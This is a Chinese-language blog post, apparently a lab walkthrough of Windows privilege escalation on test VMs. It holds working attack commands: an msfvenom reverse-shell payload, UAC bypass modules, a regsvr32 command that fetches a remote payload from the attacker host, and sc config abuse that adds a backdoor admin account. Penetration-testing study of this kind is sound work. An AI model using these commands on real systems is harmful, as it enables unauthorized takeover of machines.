

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/head.png">
  <link rel="icon" type="image/png" href="/img/head.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="haha">
  <meta name="keywords" content="">
  <title>windows提权 - 心上人是心上人</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.0.0/styles/github-gist.min.css" />
    
  

  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_pf9vaxs7x7b.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.2.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>心上人是心上人</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archives
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                Categories
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                About
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner intro-2" id="background" parallax=true
         style="background: url('/img/1.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="container page-header text-center fade-in-up">
            <span class="h2" id="subtitle">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2020-10-01 15:24" pubdate>
        October 1, 2020 pm
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      6.9k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      102
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto" id="post">
            <!-- SEO header -->
            <h1 style="display: none">windows提权</h1>
            
            <div class="markdown-body" id="post-body">
              <h2 id="1-msf提权"><a href="#1-msf提权" class="headerlink" title="1.msf提权"></a>1.msf提权</h2><p>目标：windows 7 sp1 vl：192.168.8.53</p>
<p>攻击机：kali ：192.168.8.195</p>
<p>生成木马：<code>msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.195 lport=1234 -f exe &gt;1.exe</code></p>
<h3 id="1-直接提取"><a href="#1-直接提取" class="headerlink" title="1.直接提取"></a>1.直接提取</h3><p><code>getsystem</code>：在目标非管理员时候会失败</p>
<pre><code class="hljs shell">meterpreter &gt; getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)</code></pre>

<p>倘若成功可以使用<code>getuid</code>查看当前权限级别</p>
<pre><code class="hljs shell">meterpreter &gt; getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter &gt; getuid
Server username: NT AUTHORITY\SYSTEM</code></pre>

<h3 id="2-bypassuac"><a href="#2-bypassuac" class="headerlink" title="2.bypassuac"></a>2.bypassuac</h3><p>倘若失败后就需要bypassuac了(但是尝试本次win7主机非管理员是失败的)</p>
<p><code>search bypassuac</code>（选用具体模块需要测试）</p>
<pre><code class="hljs shell">msf5 exploit(multi/handler) &gt; search bypassuac

Matching Modules
================

<span class="hljs-meta">   #</span><span class="bash">   Name                                                   Disclosure Date  Rank       Check  Description</span>
   -   ----                                                   ---------------  ----       -----  -----------
   0   exploit/windows/local/bypassuac                        2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass
   1   exploit/windows/local/bypassuac_comhijack              1900-01-01       excellent  Yes    Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
   2   exploit/windows/local/bypassuac_eventvwr               2016-08-15       excellent  Yes    Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
   3   exploit/windows/local/bypassuac_fodhelper              2017-05-12       excellent  Yes    Windows UAC Protection Bypass (Via FodHelper Registry Key)
   4   exploit/windows/local/bypassuac_injection              2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection)
   5   exploit/windows/local/bypassuac_injection_winsxs       2017-04-06       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS
   6   exploit/windows/local/bypassuac_silentcleanup          2019-02-24       excellent  No     Windows Escalate UAC Protection Bypass (Via SilentCleanup)
   7   exploit/windows/local/bypassuac_sluihijack             2018-01-15       excellent  Yes    Windows UAC Protection Bypass (Via Slui File Handler Hijack)
   8   exploit/windows/local/bypassuac_vbs                    2015-08-22       excellent  No     Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)
   9   exploit/windows/local/bypassuac_windows_store_filesys  2019-08-22       manual     Yes    Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe)
   10  exploit/windows/local/bypassuac_windows_store_reg      2019-02-19       manual     Yes    Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry</code></pre>

<p>选择一个excellent模块，需要设置一个新的session</p>
<pre><code class="hljs shell">msf5 exploit(multi/handler) &gt; use exploit/windows/local/bypassuac_silentcleanup 
msf5 exploit(windows/local/bypassuac_silentcleanup) &gt; show options                             
                                                                                               
Module options (exploit/windows/local/bypassuac_silentcleanup):                                
                                                                                               
   Name       Current Setting                                          Required  Description   
   ----       ---------------                                          --------  -----------   
   PSH_PATH   %WINDIR%\System32\WindowsPowershell\v1.0\powershell.exe  yes       The path to the Powershell binary.
   SESSION                                                             yes       The session to run this module on.
   SLEEPTIME  0                                                        no        The time (ms) to sleep before running SilentCleanup                                                                                        
                                                                                               
                                                                                               
Exploit target:                                                                                
                                                                                               
   Id  Name                                                                                    
   --  ----
   0   Microsoft Windows</code></pre>

<p>查看当前拥有的session</p>
<pre><code class="hljs shell">msf5 exploit(windows/local/bypassuac_silentcleanup) &gt; sessions -l

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  2         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ WIN-63U3JC89N2C  192.168.8.195:1234 -&gt; 192.168.8.57:49220 (192.168.8.57)</code></pre>

<p>设置session</p>
<pre><code class="hljs shell">msf5 exploit(windows/local/bypassuac_silentcleanup) &gt; sessions -i 2
[*] Starting interaction with 2...

meterpreter &gt;</code></pre>

<p>提权并查看权限</p>
<pre><code class="hljs shell">meterpreter &gt; getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter &gt; getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter &gt;</code></pre>



<h2 id="2-漏洞提权"><a href="#2-漏洞提权" class="headerlink" title="2.漏洞提权"></a>2.漏洞提权</h2><h3 id="1-补丁查询"><a href="#1-补丁查询" class="headerlink" title="1.补丁查询"></a>1.补丁查询</h3><p><code>systeminfo</code>查看windows主机相关的补丁信息</p>
<pre><code class="hljs shell">C:\Users\administrator.MCITP\Desktop&gt;systeminfo

主机名:           WIN7
OS 名称:          Microsoft Windows 7 专业版
OS 版本:          6.1.7601 Service Pack 1 Build 7601
OS 制造商:        Microsoft Corporation
OS 配置:          成员工作站
OS 构件类型:      Multiprocessor Free
注册的所有人:     Windows 用户
注册的组织:
产品 ID:          00371-868-0000007-85264
初始安装日期:     2020/10/26, 19:40:42
系统启动时间:     2020/11/16, 9:02:47
系统制造商:       VMware, Inc.
系统型号:         VMware Virtual Platform
系统类型:         x64-based PC
处理器:           安装了 1 个处理器。
                  [01]: Intel64 Family 6 Model 142 Stepping 10 Genu
2 Mhz
BIOS 版本:        Phoenix Technologies LTD 6.00, 2019/7/29
Windows 目录:     C:\Windows
系统目录:         C:\Windows\system32
启动设备:         \Device\HarddiskVolume1
系统区域设置:     zh-cn;中文(中国)
输入法区域设置:   zh-cn;中文(中国)
时区:             (UTC+08:00)北京，重庆，香港特别行政区，乌鲁木齐
物理内存总量:     2,047 MB
可用的物理内存:   1,418 MB
虚拟内存: 最大值: 4,095 MB
虚拟内存: 可用:   3,445 MB
虚拟内存: 使用中: 650 MB
页面文件位置:     C:\pagefile.sys
域:               MCITP.COM
登录服务器:       \\WIN2012
修补程序:         安装了 3 个修补程序。
                  [01]: KB2534111
                  [02]: KB2999226
                  [03]: KB976902
网卡:             安装了 1 个 NIC。
                  [01]: Intel(R) PRO/1000 MT Network Connection
                      连接名:      本地连接
                      启用 DHCP:   否
                      IP 地址
                        [01]: 192.168.8.57
                        [02]: 

C:\Users\administrator.MCITP\Desktop&gt;</code></pre>

<p>根据已打的补丁利用未打补丁的漏洞进行攻击</p>
<h3 id="2-Windows-Exploit-Suggester"><a href="#2-Windows-Exploit-Suggester" class="headerlink" title="2.Windows-Exploit-Suggester"></a>2.Windows-Exploit-Suggester</h3><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_45018333/article/details/109121732">https://blog.csdn.net/weixin_45018333/article/details/109121732</a></p>
<p>更新数据库<code>python  windows-exploit-suggester.py -u</code></p>
<pre><code class="hljs css"><span class="hljs-selector-tag">python</span> <span class="hljs-selector-tag">windows-exploit-suggester</span><span class="hljs-selector-class">.py</span> <span class="hljs-selector-tag">-u</span>
<span class="hljs-selector-attr">[*]</span> <span class="hljs-selector-tag">initiating</span> <span class="hljs-selector-tag">winsploit</span> <span class="hljs-selector-tag">version</span> 3<span class="hljs-selector-class">.3</span>...
<span class="hljs-selector-attr">[+]</span> <span class="hljs-selector-tag">writing</span> <span class="hljs-selector-tag">to</span> <span class="hljs-selector-tag">file</span> 2020<span class="hljs-selector-tag">-11-17-mssb</span><span class="hljs-selector-class">.xls</span>
<span class="hljs-selector-attr">[*]</span> <span class="hljs-selector-tag">done</span></code></pre>

<p>systeminfo &gt; win.txt获取目标主机的补丁情况</p>
<pre><code class="hljs shell">C:\Users\haha&gt;systeminfo &gt;win7.txt</code></pre>

<p><code>python windows-exploit-suggester.py -i win.txt -d 更新的数据库生成的表格</code>获取相应的可利用漏洞情况，这里只列举部分</p>
<pre><code class="hljs shell">ython windows-exploit-suggester.py -i win.txt -d 2020-11-17-mssb.xls
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (GB2312)
[*] querying database file for potential vulnerabilities
[*] comparing the 168 hotfix(es) against the 386 potential bulletins(s) with a database of 137 known exploits
[*] there are now 178 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as &#x27;Windows 7 SP1 64-bit&#x27;
[*] 
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[*]   https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
[*]   https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - &#x27;win32k.sys&#x27; &#x27;NtSetWindowLongPtr&#x27; Privilege Escalation (MS16-135) (2)
[*]   https://github.com/tinysec/public/tree/master/CVE-2016-7255
</code></pre>

<h3 id="3-结合msf的windows补丁枚举模块"><a href="#3-结合msf的windows补丁枚举模块" class="headerlink" title="3.结合msf的windows补丁枚举模块"></a>3.结合msf的windows补丁枚举模块</h3><p><code>run post/windows/gather/enum_patches</code>查看目标的补丁信息</p>
<pre><code class="hljs shell">meterpreter &gt; run post/windows/gather/enum_patches

[*] Patch list saved to /root/.msf4/loot/20201117220111_default_192.168.8.57_enum_patches_307247.txt
[+] KB2534111 installed on 10/26/2020
[+] KB2999226 installed on 10/26/2020
[+] KB976902 installed on 11/21/2010
meterpreter &gt;</code></pre>

<p>接下来就可以利用补丁情况去进行相应攻击</p>
<h2 id="3-CS提权"><a href="#3-CS提权" class="headerlink" title="3.CS提权"></a>3.CS提权</h2><p>cs和msf差不多，是一个图形化和命令行交互界面，支持扩展，msf也支持图形化(kage)，但用着不顺手。。。。但还是放几张cs进行提权的图吧。。</p>
<h3 id="1-getsystem-大多会失败"><a href="#1-getsystem-大多会失败" class="headerlink" title="1.getsystem(大多会失败)"></a>1.getsystem(大多会失败)</h3><p>这里就不放图了，主要是懒。。。。大致步骤如下</p>
<p>选中目标机直接在下面命令行交互栏中输入getsystem</p>
<h3 id="2-bypassuac-1"><a href="#2-bypassuac-1" class="headerlink" title="2.bypassuac"></a>2.bypassuac</h3><p>选中目标机—&gt;右键选择Access—&gt;Elevate—-&gt;Exploit选择uac-eventvwr</p>
<h3 id="3-漏洞提权"><a href="#3-漏洞提权" class="headerlink" title="3.漏洞提权"></a>3.漏洞提权</h3><p>同2bypassuac一样，只不过Exploit选择相应的ms模块</p>
<h2 id="4-命令提权"><a href="#4-命令提权" class="headerlink" title="4.命令提权"></a>4.命令提权</h2><h3 id="1-at命令（高版本中演变为schtasks-exe）"><a href="#1-at命令（高版本中演变为schtasks-exe）" class="headerlink" title="1.at命令（高版本中演变为schtasks.exe）"></a>1.at命令（高版本中演变为schtasks.exe）</h3><p>在win2000、win2003、winxp可以将其由administrator提升到system。</p>
<p>at发布的定时计划任务，win下默认以system权限运行，定时计划任务可以是批处理、二进制文件</p>
<p>语法：at  时间  命令</p>
<pre><code class="hljs angelscript">C:\Documents <span class="hljs-keyword">and</span> Settings\Administrator&gt;at <span class="hljs-number">22</span>:<span class="hljs-number">21</span> /<span class="hljs-built_in">int</span>eractive calc.exe
新加了一项作业，其作业 ID = <span class="hljs-number">2</span></code></pre>

<p>at结合msf</p>
<p>msf中：</p>
<pre><code class="hljs shell">msf6 exploit(multi/handler) &gt; use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) &gt; set payload windows/meterpreter/reverse_tcp
payload =&gt; windows/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) &gt; set lhost 192.168.8.75
lhost =&gt; 192.168.8.75
msf6 exploit(multi/script/web_delivery) &gt; show targets

Exploit targets:

   Id  Name
   --  ----
   0   Python
   1   PHP
   2   PSH
   3   Regsvr32
   4   pubprn
   5   PSH (Binary)
   6   Linux
   7   Mac OS X


msf6 exploit(multi/script/web_delivery) &gt; set target 3
target =&gt; 3
msf6 exploit(multi/script/web_delivery) &gt; run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.8.75:4444 
[*] Using URL: http://0.0.0.0:8080/bYakzIMD
[*] Local IP: http://192.168.8.75:8080/bYakzIMD
[*] Server started.
[*] Run the following command on the target machine:
regsvr32 /s /n /u /i:http://192.168.8.75:8080/bYakzIMD.sct scrobj.dll
msf6 exploit(multi/script/web_delivery) &gt;</code></pre>

<p>目标中（win2003）：</p>
<pre><code class="hljs shell">C:\Documents and Settings\Administrator&gt;at 10:39 /interactive regsvr32 /s /n /
/i:http://192.168.8.75:8080/bYakzIMD.sct scrobj.dll
新加了一项作业，其作业 ID = 1

C:\Documents and Settings\Administrator&gt;</code></pre>

<p>会出现问题，目前没有解决方案</p>
<p><img src="C:\Users\haha\AppData\Roaming\Typora\typora-user-images\image-20201118104027316.png" srcset="/img/loading.gif" alt="image-20201118104027316"></p>
<p>可以选择上线木马获取shell</p>
<p>目标中</p>
<pre><code class="hljs taggerscript">C:<span class="hljs-symbol">\D</span>ocuments and Settings<span class="hljs-symbol">\A</span>dministrator&gt;at 10:49 C:<span class="hljs-symbol">\D</span>ocuments and Settings<span class="hljs-symbol">\A</span>dmin
istrator<span class="hljs-symbol">\桌</span>面<span class="hljs-symbol">\1</span>.exe
新加了一项作业，其作业 ID = 1

C:<span class="hljs-symbol">\D</span>ocuments and Settings<span class="hljs-symbol">\A</span>dministrator&gt;</code></pre>

<p>攻击机开启监听即可</p>
<pre><code class="hljs shell">msf6 exploit(multi/handler) &gt; run

[*] Started reverse TCP handler on 192.168.8.75:1234 
[*] Sending stage (175174 bytes) to 192.168.8.64
[*] Meterpreter session 2 opened (192.168.8.75:1234 -&gt; 192.168.8.64:1038) at 2020-11-18 10:50:50 +0800

meterpreter &gt; getuid
Server username: WIN2003\Administrator

meterpreter &gt; getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter &gt; getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter &gt;</code></pre>



<h3 id="2-sc命令"><a href="#2-sc命令" class="headerlink" title="2.sc命令"></a>2.sc命令</h3><p>win7、03、8、08、12、16</p>
<p>sc是用于与服务控制管理器和服务进行通信的命令行程序。提供的功能类似于“控制面板”中“管理工具”项中“服务”。</p>
<p><code>sc Create syscmd binPath= &quot;cmd /K start&quot; type= own type= interact</code>创建一个名叫syscmd的新的交互式的cmd服务</p>
<pre><code class="hljs shell">C:\Documents and Settings\Administrator&gt;sc Create syscmd binPath= &quot;cmd /K start&quot;
 type= own type= interact
[SC] CreateService 成功</code></pre>

<p>然后执行<code>sc start syscmd</code>，就弹出一个system权限的cmd环境</p>
<pre><code class="hljs shell">C:\WINDOWS\system32&gt;whoami
nt authority\system

C:\WINDOWS\system32&gt;</code></pre>



<h2 id="5-配置错误导致提权"><a href="#5-配置错误导致提权" class="headerlink" title="5.配置错误导致提权"></a>5.配置错误导致提权</h2><p>环境准备：目标：win10 1909 ：192.168.10.128</p>
<p>​                    攻击机：kali：192.168.8.75</p>
<p>先将以下保存为bat文件以管理员执行，目的是为了刚安装的虚拟机增加一些系统自启的高权限服务</p>
<pre><code class="hljs shell">echo [*] Create user lowuser
net user lowuser lowuser1234 /add
echo [*] Create directories for the binaryPath of our services
mkdir &quot;C:\WeakServices\Weak Service 1&quot;
mkdir &quot;C:\WeakServices\WeakService2&quot;
mkdir &quot;C:\WeakServices\WeakService3&quot;
mkdir &quot;C:\WeakServices\WeakService4&quot;
echo [*] Use a default binary
copy C:\Windows\System32\snmptrap.exe &quot;C:\WeakServices\Weak Service 1\service1.exe&quot;
copy C:\Windows\System32\snmptrap.exe &quot;C:\WeakServices\WeakService2\service2.exe&quot;
copy C:\Windows\System32\snmptrap.exe &quot;C:\WeakServices\WeakService3\service3.exe&quot;
copy C:\Windows\System32\snmptrap.exe &quot;C:\WeakServices\WeakService4\service4.exe&quot;
echo [*] settings 权
icacls &quot;C:\WeakServices\Weak Service 1&quot; /deny lowuser:M
icacls &quot;C:\WeakServices\WeakService3&quot; /deny lowuser:M
icacls &quot;C:\WeakServices\WeakService4&quot; /deny lowuser:M
echo [*] 四服务
sc create WeakService1 displayName= &quot;Unquoted Service Path&quot; binPath= &quot;C:\WeakServices\Weak Service 1\service1.exe&quot; start= auto
sc create WeakService2 displayName= &quot;Weak Folder Permissions&quot; binPath= &quot;C:\WeakServices\WeakService2\service2.exe&quot; start= auto
sc create WeakService3 displayName= &quot;Weak Service Permissions&quot; binPath= &quot;C:\WeakServices\WeakService3\service3.exe&quot; obj= .\lowuser password= lowuser1234 start= auto
sc create WeakService4 displayName= &quot;Weak Registry Permissions&quot; binPath= &quot;C:\WeakServices\WeakService4\service4.exe&quot; start= demand
echo [*] Modifying WeakService3&#x27;s permissions
sc sdset WeakService3 &quot;D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;DCLCSWRPWPDTLOCRSDRCWDWO;;;WD)&quot;</code></pre>

<p>成功后会增加一个lowuser，在C:\WeakServices\下增加4个文件夹，分别对应下面利用方式的一、二、三、四</p>
<pre><code class="hljs routeros">C:\Users\haha&gt;net user

\\DESKTOP-5DQV85P 的用户帐户

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
lowuser                  WDAGUtilityAccount
命令成功完成。</code></pre>

<h3 id="1-不带引号的的路径服务"><a href="#1-不带引号的的路径服务" class="headerlink" title="1.不带引号的的路径服务"></a>1.不带引号的的路径服务</h3><h4 id="1-简述"><a href="#1-简述" class="headerlink" title="1.简述"></a>1.简述</h4><p>当系统管理员配置Windows服务时，他们必须指定要执行的命令，或者运行可执行文件的路径。当Windows服务运行时，会发生以下两种情况之一。</p>
<p>1.如果给出了可执行文件，并且引用了完整路径，则系统会按字面解释它并执行。</p>
<p>2.如果服务的二进制路径未包含在引号中，则操作系统将会执行找到的空格分隔的服务路径的第一个实例。</p>
<p>若是第二种，例如<code>C:\WeakServices\Weak Service 1\service1.exe</code></p>
<p>​        寻找路径为 <code>1.C:\WeakServices\Weak</code></p>
<p>​                             <code>    2.C:\WeakServices\Weak Service 1</code></p>
<p>​                             <code>3.C:\WeakServices\Weak Service 1\service1.exe</code></p>
<h4 id="2-利用方法"><a href="#2-利用方法" class="headerlink" title="2.利用方法"></a>2.利用方法</h4><p>根据此寻找方式，可以将C:\WeakServices\Weak替换为C:\WeakServices\Weak.exe，Weak.exe为我们的马，因为在寻找二进制过程中，当发现由exe结尾的就会认为是对应服务的二进制文件</p>
<p>要想寻找不带引号的路径，可以使用wmic命令</p>
<p><code>wmic service get name,displayname,startmode,pathname | findstr /i /v &quot;C:\Windows\\&quot; |findstr /i /v &quot;&quot;&quot;</code>  startmode:启动方式；</p>
<pre><code class="hljs shell">C:\Users\lowuser&gt;wmic service get name,displayname,startmode,pathname | findstr /i /v &quot;C:\Windows\\&quot; |findstr /i /v &quot;&quot;&quot;
DisplayName                                            Name                                      PathName                                                                           StartMode
LSM                                                    LSM                                                                                                                          Unknown
NetSetupSvc                                            NetSetupSvc                                                                                                                  Unknown
Unquoted Service Path                                  WeakService1                              C:\WeakServices\Weak Service 1\service1.exe                                        Auto
Weak Folder Permissions                                WeakService2                              C:\WeakServices\WeakService2\service2.exe                                          Auto
Weak Service Permissions                               WeakService3                              C:\WeakServices\WeakService3\service3.exe                                          Auto
Weak Registry Permissions                              WeakService4                              C:\WeakServices\WeakService4\service4.exe                                          Manual

C:\Users\lowuser&gt;</code></pre>

<p>使用sc查看对应的服务信息：<code>sc qc [servicename]</code></p>
<pre><code class="hljs shell">C:\Users\lowuser&gt;sc qc WeakService1
[SC] QueryServiceConfig 成功

SERVICE_NAME: WeakService1
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\WeakServices\Weak Service 1\service1.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Unquoted Service Path
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem</code></pre>

<p>注意到START_TYPE : 2   AUTO_START，意思为该服务随系统启动而自启动，当低权限用户无法重启服务时，我们可以等待目标系统重启来上线我们的马</p>
<p>另外也可以查看该服务的父目录BINARY_PATH_NAME的权限<code>icacls [path]</code></p>
<pre><code class="hljs latex">C:<span class="hljs-tag">\<span class="hljs-name">Users</span></span><span class="hljs-tag">\<span class="hljs-name">lowuser</span></span>&gt;icacls  C:<span class="hljs-tag">\<span class="hljs-name">WeakServices</span></span><span class="hljs-tag">\</span>
C:<span class="hljs-tag">\<span class="hljs-name">WeakServices</span></span><span class="hljs-tag">\<span class="hljs-name"> </span></span>BUILTIN<span class="hljs-tag">\<span class="hljs-name">Administrators</span></span>:(I)(OI)(CI)(F)
                 NT AUTHORITY<span class="hljs-tag">\<span class="hljs-name">SYSTEM</span></span>:(I)(OI)(CI)(F)
                 BUILTIN<span class="hljs-tag">\<span class="hljs-name">Users</span></span>:(I)(OI)(CI)(RX)
                 NT AUTHORITY<span class="hljs-tag">\<span class="hljs-name">Authenticated</span></span> Users:(I)(M)
                 NT AUTHORITY<span class="hljs-tag">\<span class="hljs-name">Authenticated</span></span> Users:(I)(OI)(CI)(IO)(M)

已成功处理 1 个文件; 处理 0 个文件时失败

C:<span class="hljs-tag">\<span class="hljs-name">Users</span></span><span class="hljs-tag">\<span class="hljs-name">lowuser</span></span>&gt;</code></pre>

<p>发现为system权限，即为我们想要的。((M)代表修改权限，(F)代表完全控制，(CI)代表从属容器将继承访问控制项，(OI)代表从属文件将继承访问控制项。)</p>
<p>但是获得meterpreter会话后不久就会断掉，这是因为当一个服务在Windows系统中启动后，它必须和服务控制管理器通信。如果没有通信，服务控制管理器会认为出现了错误，并会终止这个进程。我们所有需要做的就是在终止载荷进程之前，将它迁移到其它进程，也可以使用自动迁移：<code>set AutoRunScript migrate -f</code></p>
<h4 id="3-实际应用"><a href="#3-实际应用" class="headerlink" title="3.实际应用"></a>3.实际应用</h4><p>1.msf生成一个马取名为Weak.exe将其放置在C:\WeakServices\下，重启目标机后msf上线，再迁移进程</p>
<p>2.msf下已经集成了该模块(exploit/windows/local/trusted_service_path )</p>
<h3 id="2-弱文件夹权限"><a href="#2-弱文件夹权限" class="headerlink" title="2.弱文件夹权限"></a>2.弱文件夹权限</h3><p>AccessChk可查找用户可修改的服务</p>
<p>当查询到的服务是<code>RW Everyone</code>之后，将马替换成服务启动的exe，等待重启系统即可。</p>
<h3 id="3-不安全的服务权限"><a href="#3-不安全的服务权限" class="headerlink" title="3.不安全的服务权限"></a>3.不安全的服务权限</h3><p>当用户对某种服务拥有过多的权限时也可造成攻击</p>
<p>AccessChk可查找用户可修改的服务</p>
<p><code>accesschk.exe -uwcqv “Authenticated Users” * /accepteula</code></p>
<p><code>accesschk.exe -uwcqv “user” *</code></p>
<p>sc也可：<code>sc qc “[Service]”</code></p>
<p>利用手法</p>
<p>1.修改服务的BINARY_PATH_NAME,并重启该服务即可提升system权限。</p>
<p><code>sc config [servicename] binPath=[path] obj=LocalLystem</code></p>
<p>2.修改服务配置执行命令。BINARY_PATH_NAME参数指向了该服务的可执行程序(PFNET)路径。如果我们将这个值修改成任何命令，那意味着这个命令在该服务下一次启动时，将会以SYSTEM权限运行。</p>
<pre><code class="hljs shell">sc config PFNET binpath= &quot;net user rottenadmin P@ssword123! /add&quot; 
sc stop PFNET
sc start PFNETsc config PFNET binpath= &quot;net localgroup rottenadmin P@ssword123! /add&quot; 
sc stop PFNET 
sc start PFNET</code></pre>

<p>当尝试启动服务时，它会返回一个错误。这一点我们之前已经讨论过了，在Windows系统中，当一个服务在Windows系统中启动后，它必须和服务控制管理器通信。如果没有通信，服务控制管理器会认为出现了错误，并会终止这个进程。上面的“net user”肯定是无法和服务管理器通信的，但是不用担心，我们的命令已经以SYSTEM权限运行了，并且成功添加了一个用户。</p>
<h3 id="4-注册表权限不足"><a href="#4-注册表权限不足" class="headerlink" title="4.注册表权限不足"></a>4.注册表权限不足</h3><p>本地没有复现成功，后续会补上</p>
<h3 id="5-AlwaysInstallElevated"><a href="#5-AlwaysInstallElevated" class="headerlink" title="5.AlwaysInstallElevated"></a>5.AlwaysInstallElevated</h3><p>AlwaysInstallElevated是一个策略设置，允许非管理用户以SYSTEM权限运行Microsoft Windows安装程序包（.MSI文件）的设置。默认情况下禁用此设置，需系统管理员手动启用他，当在系统中使用Windows Installer安装任何程序时，该参数允许非特权用户以system权限运行MSI文件。如果目标系统上启用了这一设置，我们可以使用msf生成msi文件来以system权限执行任意payload。</p>
<p>可以通过查询以下注册表来识别此设置，当两个注册表键值查询结果均为1时，代表该策略已启用。</p>
<pre><code class="hljs shell">[HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer] “AlwaysInstallElevated”=dword:00000001
